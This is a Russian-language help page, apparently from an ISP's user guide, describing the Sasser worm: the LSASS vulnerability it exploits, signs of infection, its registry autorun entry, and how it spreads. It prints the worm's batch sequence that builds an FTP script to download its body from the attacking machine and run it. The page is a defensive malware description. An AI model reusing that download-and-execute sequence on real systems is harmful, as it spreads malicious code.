Руководство пользователя Основные правила работы в сети и её возможности


Прежде всего
Основные программы для работы в сети
Принцип начисления абон. платы
Краткий словарь интернет жаргона


Общение
Игры в сети и интернет
Электронная почта
Медиа сервисы
Файл-обменная сеть
Файлообменник
FTP серверы


Лечение вирусов Lovesan и Sasser
Безопасность работы в интернете и локальной сети
Описание вируса Kargo
Описание вируса Sasser
Методика использования антивирусных программ
Утилиты скрытого администрирования
Троянские кони (логические бомбы)
FAQ по сетевому червю Lovesan


Создание подключения к локальной сети
Настройка Antivir'a
Создание VPN соединения
Распространённые ошибки VPN подключения
Настройки чат клиентов
Настройка клиентов обменной сети
Настройка почтовых программ
Чтения новостных лент в формате RSS
Настройка FTP сервера
Смена тарифного плана
Создание VPN соединения
Полезные утилиты
Про вирусы  /  Описание вируса Sasser
Описание вируса Sasser

Worm.Win32.Sasser.a

Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011.
Патч, исправляющий данную уязвимость был выпущен 13 апреля 2004 года (его можно найти по ссылке выше). Первые экземпляры червя были обнаружены 30 апреля 2004 года.
Принцип работы червя очень схож с тем, что был использован в черве
Lovesan, в августе 2003 года, за исключением того, что Lovesan использовал аналогичную уязвимость в другой службе Windows - RPC DCOM.
Заражению подвержены компьютеры, работающие под управлением Windows 2000, Windows XP, Windows Server 2003. На других версиях Windows червь работоспособен, но заразить их извне, путем атаки через уязвимость, не сможет.
Червь написан на языке C/C++, с использованием компилятора Visual C. Имеет размер около 15 КБ, упакован PECompact2.
Признаками заражения компьютера являются:

·        Наличие файла "avserve.exe" в каталоге Windows.
·        Сообщение об ошибке (LSASS service failing) приводящее к перезагрузке системы.

Размножение

При запуске червь копирует себя в корневой каталог Windows с именем "avserve.exe" и регистрирует себя в ключе автозапуска:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avserve.exe" = "%WINDIR%\avserve.exe"

Создает в памяти уникальный идентификатор "Jobaka3l" для определения своего присутствия в системе.
Запускает FTP службу на порту TCP 5554 и запускает 128 процедур своего размножения. В ходе работы червь пытается вызвать системную процедуру AbortSystemShutdown для запрета перезагрузки системы.
Червь запускает процедуры выбора IP-адресов для атаки и отсылает на порт TCP 445 запрос. В случае если удаленный компьютер отвечает на соединение и отправляет эксплоит LSASS, который, используя данную уязвимость, запускает на удаленной машине командную оболочку "cmd.exe" на TCP порту 9996.
После этого червь передает на атакуемую машину команды для загрузки и запуска своего тела:

echo off
echo open
[адрес машины с которой производится атака] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get
[произвольное число]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[произвольное число]
_up.exe
echo off
del cmd.ftp
echo on

Таким образом один и тот же компьютер может многократно подвергаться атакам и содержать несколько копий червя в виде файлов с именами, например:

23101_up.exe

5409_up.exe
и т.д.

Прочее

После заражения инфицированная машина выводит сообщение об ошибке LSASS service failing, после чего может попытаться перезагрузиться.
Червь создает в корневом каталоге диска C: файл "win.log", который содержит IP-адреса атакуемых машин.

Взято с http://www.viruslist.ru/